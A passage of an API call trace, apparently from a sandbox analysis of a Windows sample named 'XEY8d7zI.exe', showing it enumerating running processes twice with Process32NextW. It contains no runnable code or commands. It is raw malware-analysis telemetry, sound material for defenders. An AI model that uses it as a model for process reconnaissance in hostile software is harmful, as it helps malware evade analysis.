lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.924] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.928] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0127.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.985] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.986] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0127.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0127.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.004] CloseHandle (hObject=0xc4) returned 1 [0128.004] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.009] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 